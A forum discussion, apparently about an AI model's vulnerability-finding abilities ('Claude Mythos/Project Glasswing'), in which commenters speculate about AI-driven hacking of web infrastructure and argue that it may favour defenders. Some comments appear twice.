For what it’s worth, this is in line with my expectations for what LLMs should be capable of and it doesn’t update me much towards their AGI-completeness. (Though it’s at the more bullish end of past!me’s predictions.) Receipts-wise, I’m not sure I laid it out publicly anywhere, but here’s an excerpt from a message I’d sent to @habryka in January 2025:
[T]he worse end of the scenarios I’m imagining is...
The o-series of models potentially doesn’t scale to superhuman programmers-in-general, but does scale to superhuman hackers: because “find a way to make this abstraction leak” is precisely the kind of programming task that is well-posed/isomorphic to a rigorous-math task (“find a flaw in this proof/this statement of tautology”).
I expect that ~all of the components of the current web stack contain countless vulnerabilities that are relatively easy to discover, and which aren’t exploited simply because finding them would require a talented programmer to parse vast mountains of code (application code, and the code of its dependencies, and the dependencies of dependencies, and any cross-interactions between them...).
AI agents of the above type would remove this friction cost.
So if this scenario comes to pass, I expect them to be discovering Heartbleeds and Log4Shells on a daily or weekly basis. Then, at any given time, they would be using that to simultaneously attack large random subsets of the entirety of the Internet infrastructure.
I do, however, still find myself unpleasantly surprised by this. I wouldn’t say it happened “earlier than I hoped”, inasmuch as I did not have specific predictions about the timing… But, well, any time for it to happen would be unpleasantly early, I suppose.
This may ultimately be an edge for defense not offense. The status quo is that anyone with enough resources and enough programmers to throw at the task could have an exploit in whatever they wanted.
If the ‘most capable hacker on earth’ is an open model, it means that you will be able to reverse engineer your own equipment, build better rules for detection, actually do analysis of low level logs that would normally be too time consuming, and attackers would have no confidence that their exploits stay secret.
Compsci theory (weird machines) tells us that exploits exist in any sufficiently complicated codebase.
Targets who are too lazy to adopt technical measures like these are likely wide open today, so the increased vulnerability is irrelevant.
Regarding Claude Mythos/Project Glasswing:
For what it’s worth, this is in line with my expectations for what LLMs should be capable of and it doesn’t update me much towards their AGI-completeness. (Though it’s at the more bullish end of past!me’s predictions.) Receipts-wise, I’m not sure I laid it out publicly anywhere, but here’s an excerpt from a message I’d sent to @habryka in January 2025:
I do, however, still find myself unpleasantly surprised by this. I wouldn’t say it happened “earlier than I hoped”, inasmuch as I did not have specific predictions about the timing… But, well, any time for it to happen would be unpleasantly early, I suppose.
This may ultimately be an edge for defense not offense. The status quo is that anyone with enough resources and enough programmers to throw at the task could have an exploit in whatever they wanted.
If the ‘most capable hacker on earth’ is an open model, it means that you will be able to reverse engineer your own equipment, build better rules for detection, actually do analysis of low level logs that would normally be too time consuming, and attackers would have no confidence that their exploits stay secret.
Compsci theory (weird machines) tells us that exploits exist in any sufficiently complicated codebase.
Targets who are too lazy to adopt technical measures like these are likely wide open today, so the increased vulnerability is irrelevant.